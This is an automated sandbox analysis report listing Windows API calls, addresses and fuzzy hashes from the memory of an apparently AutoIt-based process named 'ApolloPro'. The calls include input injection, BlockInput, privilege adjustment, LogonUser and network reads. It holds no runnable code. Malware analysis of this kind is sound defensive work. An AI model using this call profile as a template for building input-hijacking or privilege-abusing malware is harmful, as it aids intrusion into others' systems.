                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                              • String ID:
                                                                                              • API String ID: 2387731787-0
                                                                                              • Opcode ID: b1cc19a23fd3364e8dc9ba10835bd6b9887fa1bb947031a3e009ada59e715409
                                                                                              • Instruction ID: c9895d5aa01fe403fbfd2e20ba154fc16824822ef1a12e5445c60481420b169d
                                                                                              • Opcode Fuzzy Hash: b1cc19a23fd3364e8dc9ba10835bd6b9887fa1bb947031a3e009ada59e715409
                                                                                              • Instruction Fuzzy Hash: 1951AA35A046028FDB14DF68D490EAAB3EAEF49320F10461DE95ACB7A1DB30ED05CB91
                                                                                              APIs
                                                                                                • Part of subcall function 006A8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006A84A0
                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 006A6E89
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 006A6EB2
                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 006A6EEB
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 006A6EF8
                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 006A6F0C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                              • String ID:
                                                                                              • API String ID: 99427753-0
                                                                                              • Opcode ID: a1420d2e0f01d591b3b065549bd90ea70b990a1ef2e1570e5cf4bd3bd15e8fa7
                                                                                              • Instruction ID: 7c0de60f16ede4cc1055f9efa0a017ad0c2e0cd0bd4c3ec64795af395fc2673f
                                                                                              • Opcode Fuzzy Hash: a1420d2e0f01d591b3b065549bd90ea70b990a1ef2e1570e5cf4bd3bd15e8fa7
                                                                                              • Instruction Fuzzy Hash: 2941B175600200AFEB50BF64DC86F7EB7AAAF45714F04855CF945AB3D2DA70AD008BE5
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                              • String ID:
                                                                                              • API String ID: 292994002-0
                                                                                              • Opcode ID: 17fd68ce97e9fa424a99efcd12db1eb5adadb874725c140dd9b46d9c01ca9627
                                                                                              • Instruction ID: d8c32a8416fc9c77e1562cc3e04128144d82035cf2cf6c45d4c70e07af03fdcb
                                                                                              • Opcode Fuzzy Hash: 17fd68ce97e9fa424a99efcd12db1eb5adadb874725c140dd9b46d9c01ca9627
                                                                                              • Instruction Fuzzy Hash: 2111B6B2700911ABE7216F269C84BEAB79BEF44720F044129F847E7241CA30ED418BE4
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: LocalTime__swprintf
                                                                                              • String ID: %.3d$WIN_XPe
                                                                                              • API String ID: 2070861257-2409531811
                                                                                              • Opcode ID: bf31014f29401f9669aab91c16a10eddf11dce3f45ffc0bbcdefd62e9dd1234f
                                                                                              • Instruction ID: 33862694416f20f937b6a73aa16cfe80439aa1f6165fa54d0ce07687ecb93f2d
                                                                                              • Opcode Fuzzy Hash: bf31014f29401f9669aab91c16a10eddf11dce3f45ffc0bbcdefd62e9dd1234f
                                                                                              • Instruction Fuzzy Hash: 2DD05BB1C14219EAD719DB90CC44DFA737EEB04315F208052F50AE2040D335878DEB36
                                                                                              APIs
                                                                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,006A1ED6,00000000), ref: 006A2AAD
                                                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 006A2AE4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                                                              • String ID:
                                                                                              • API String ID: 599397726-0
                                                                                              • Opcode ID: 1630ecca9ef2f3171eb81bb763a245d2b5cab4b42d03bc1a14352a72fcfed028
                                                                                              • Instruction ID: 7bd763bf354e27f732b56f2872dec8305413be0b7652da1645fbb51d87a06e57
                                                                                              • Opcode Fuzzy Hash: 1630ecca9ef2f3171eb81bb763a245d2b5cab4b42d03bc1a14352a72fcfed028
                                                                                              • Instruction Fuzzy Hash: AE41F77164020AFFEB20EE98CC91EBBB7BEEB41714F10405EF601A7241DA70AE419E60
                                                                                              APIs
                                                                                                • Part of subcall function 00650FE6: std::exception::exception.LIBCMT ref: 0065101C
                                                                                                • Part of subcall function 00650FE6: __CxxThrowException@8.LIBCMT ref: 00651031
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006893E3
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00689410
                                                                                              • GetLastError.KERNEL32 ref: 0068941D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 1922334811-0
                                                                                              • Opcode ID: 5c5824ce874b42d0003f44373f42a3597868027edd1d616000dddac9d776665a
                                                                                              • Instruction ID: f0a443c418e965a033e5fe1b12336763d886a1e6b51e40ca622d4e9665533112
                                                                                              • Opcode Fuzzy Hash: 5c5824ce874b42d0003f44373f42a3597868027edd1d616000dddac9d776665a
                                                                                              • Instruction Fuzzy Hash: 8411BFB1414205AFE728EF54DC85D3BB7FEEB48311B24862EE84983240EB70AC41CB60
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00694271
                                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 006942B2
                                                                                              • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006942BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                                              • String ID:
                                                                                              • API String ID: 33631002-0
                                                                                              • Opcode ID: 700540cd1447ac4510af49c21e3fb423f4e3d27d2d9cd657dea7f0eef94e5923
                                                                                              • Instruction ID: af30be93fb8e2dc8693552565189dbf409775fa270e1bd8d0d3db8fb9e1d527d
                                                                                              • Opcode Fuzzy Hash: 700540cd1447ac4510af49c21e3fb423f4e3d27d2d9cd657dea7f0eef94e5923
                                                                                              • Instruction Fuzzy Hash: 74113C75E01228BBEB108FA5AC44FBFBBBDEB45B60F104166FD04E7390C6705A018BA1
                                                                                              APIs
                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00694F45
                                                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00694F5C
                                                                                              • FreeSid.ADVAPI32(?), ref: 00694F6C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                              • String ID:
                                                                                              • API String ID: 3429775523-0
                                                                                              • Opcode ID: 51e5e3769d40ee09d31b23e26a4f62f67bbeb0082f54ce5f51c643c89d0a149d
                                                                                              • Instruction ID: 94c87f1809b9cd415ee76ccd9b1ce2645f171763ad7424896954e31f3ab6b013
                                                                                              • Opcode Fuzzy Hash: 51e5e3769d40ee09d31b23e26a4f62f67bbeb0082f54ce5f51c643c89d0a149d
                                                                                              • Instruction Fuzzy Hash: 4CF03775A1120DFFEF04DFE09C89EBEBBBDEB08201F0044A9A901E2680E6346A448B50
                                                                                              APIs
                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00691B01
                                                                                              • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00691B14
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: InputSendkeybd_event
                                                                                              • String ID:
                                                                                              • API String ID: 3536248340-0
                                                                                              • Opcode ID: 2e4e3ec55e40c349aaad39f844f5134cdd322a23ce34d2662c94f1f3a5617ce2
                                                                                              • Instruction ID: 8773de78f49c273ce5c9048a75f4fa79c62411648d5422cc58703954824ac7df
                                                                                              • Opcode Fuzzy Hash: 2e4e3ec55e40c349aaad39f844f5134cdd322a23ce34d2662c94f1f3a5617ce2
                                                                                              • Instruction Fuzzy Hash: 27F0497190020DEBEB00CF94C805BFE7BB9FF04315F10804AF9599A292D3799615DF94
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,006A9B52,?,006C098C,?), ref: 0069A6DA
                                                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,006A9B52,?,006C098C,?), ref: 0069A6EC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFormatLastMessage
                                                                                              • String ID:
                                                                                              • API String ID: 3479602957-0
                                                                                              • Opcode ID: 3c10c9fadb6c285fd0fc4dccb418e4d85c5e7284f7c9c9022a3cf7841fc12552
                                                                                              • Instruction ID: d4c6b27b200b2976206de4b9c292a98570f7be46aac95d9a8d655789909574bb
                                                                                              • Opcode Fuzzy Hash: 3c10c9fadb6c285fd0fc4dccb418e4d85c5e7284f7c9c9022a3cf7841fc12552
                                                                                              • Instruction Fuzzy Hash: 0DF0893550421DBBDB209FA4CC48FEA77AEAF09351F004156B508D6141D6309551CBE1
                                                                                              APIs
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00688F27), ref: 00688DFE
                                                                                              • CloseHandle.KERNEL32(?,?,00688F27), ref: 00688E10
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                                              • String ID:
                                                                                              • API String ID: 81990902-0
                                                                                              • Opcode ID: fefde609ef1d42d2d93bf42849b47a90e841842d844fa328cd16bb3676c9a0a9
                                                                                              • Instruction ID: b4ba9b1aa782d9c25e082bee55a4b89b640215e8c21ffb7e7558cd5e5ac58b52
                                                                                              • Opcode Fuzzy Hash: fefde609ef1d42d2d93bf42849b47a90e841842d844fa328cd16bb3676c9a0a9
                                                                                              • Instruction Fuzzy Hash: 32E04F35000600EFE7612B10EC08E7377AEEB04321B11891DF899844B0CB215C90DB10
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,0000FFFF,00658F87,0000FCD7,?,?,00000001), ref: 0065A38A
                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0065A393
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: 93bf818ba7a7be8c2fe6c9cf3c0179e4ca74d3dcbead921de56248699a50fdc9
                                                                                              • Instruction ID: 8ac61512d5c9a2c7bde5364547b189380da3b1c223adbb787b6ef53fb956ea4d
                                                                                              • Opcode Fuzzy Hash: 93bf818ba7a7be8c2fe6c9cf3c0179e4ca74d3dcbead921de56248699a50fdc9
                                                                                              • Instruction Fuzzy Hash: 6AB09231064249EBEB402B91EC09FA83F6AEB84A62F005010FA0D44060CF6254508A91
                                                                                              APIs
                                                                                              • BlockInput.USER32(00000001), ref: 006A45F0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: BlockInput
                                                                                              • String ID:
                                                                                              • API String ID: 3456056419-0
                                                                                              • Opcode ID: 448a20ff8cb525b2539f26cfc89910b4e122ca131fb51bea8dfa371d905ad2e3
                                                                                              • Instruction ID: 1a8fdcdc307d79546c48dc3cc6c7a898a4099001b661ac8e89440682a435c5f2
                                                                                              • Opcode Fuzzy Hash: 448a20ff8cb525b2539f26cfc89910b4e122ca131fb51bea8dfa371d905ad2e3
                                                                                              • Instruction Fuzzy Hash: A4E09A312002059FD340AF5AE800A9AF7EAAF95760F00801AF809C7310DEB0AC018B90
                                                                                              APIs
                                                                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00695205
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: mouse_event
                                                                                              • String ID:
                                                                                              • API String ID: 2434400541-0
                                                                                              • Opcode ID: f390d6ec50e44e73c5de2943604967ab0d32d9c7e18f6871c16699e831ad8066
                                                                                              • Instruction ID: ea08fe65c1b3dca8b1192a8059a938a1294aedae87d8e409cb40273b290cab1a
                                                                                              • Opcode Fuzzy Hash: f390d6ec50e44e73c5de2943604967ab0d32d9c7e18f6871c16699e831ad8066
                                                                                              • Instruction Fuzzy Hash: DBD052A4160E0A7AFD5A03248E0FFB6160FE3017C0F844249B80389AC2ECE06882B631
                                                                                              APIs
                                                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00688FA7), ref: 00689389
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: LogonUser
                                                                                              • String ID:
                                                                                              • API String ID: 1244722697-0
                                                                                              • Opcode ID: 9a64a2e6969c707954014d1d795d03ee0c180e8379c94a61d017f298b33ba4e4
                                                                                              • Instruction ID: ef33e0c753776a74951c132fa1c1c2213ea8be5fd41df86bcc3d47a864979588
                                                                                              • Opcode Fuzzy Hash: 9a64a2e6969c707954014d1d795d03ee0c180e8379c94a61d017f298b33ba4e4
                                                                                              • Instruction Fuzzy Hash: 84D09E3226450EABEF019EA4DD05EBE3B6AEB04B01F408511FE15D51A1C775D935AB60
                                                                                              APIs
                                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 00670734
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameUser
                                                                                              • String ID:
                                                                                              • API String ID: 2645101109-0
                                                                                              • Opcode ID: 6296b00e1244fb73f2eb521d3b7b8f88e98a18dab098c204f783892c30a0e401
                                                                                              • Instruction ID: 9fd1d7ca48f35b105f6df7338145e7e05df54bf7169bba40431b00438248f6b7
                                                                                              • Opcode Fuzzy Hash: 6296b00e1244fb73f2eb521d3b7b8f88e98a18dab098c204f783892c30a0e401
                                                                                              • Instruction Fuzzy Hash: 93C048F2810109DBEB05DBA0DA88EFEBBBDAB08314F21405AA10AB2100D7789B448A71
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0065A35A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: d31bf46eb13120cf4bd5aa76e38d7a695db84faf1e6fcd75c09832d3a352c035
                                                                                              • Instruction ID: 5c3069a3ad03feeb74759c14527fb7c3f1267e32b3ab0757e395eb118af356f0
                                                                                              • Opcode Fuzzy Hash: d31bf46eb13120cf4bd5aa76e38d7a695db84faf1e6fcd75c09832d3a352c035
                                                                                              • Instruction Fuzzy Hash: 30A0223002020CFBCF002F82FC08CA8BFAEEB802A0F008020F80C00032CF33A8208AC0
                                                                                              APIs
                                                                                              • DeleteObject.GDI32(00000000), ref: 006A7F45
                                                                                              • DeleteObject.GDI32(00000000), ref: 006A7F57
                                                                                              • DestroyWindow.USER32 ref: 006A7F65
                                                                                              • GetDesktopWindow.USER32 ref: 006A7F7F
                                                                                              • GetWindowRect.USER32(00000000), ref: 006A7F86
                                                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 006A80C7
                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 006A80D7
                                                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A811F
                                                                                              • GetClientRect.USER32(00000000,?), ref: 006A812B
                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 006A8165
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A8187
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A819A
                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A81A5
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 006A81AE
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A81BD
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 006A81C6
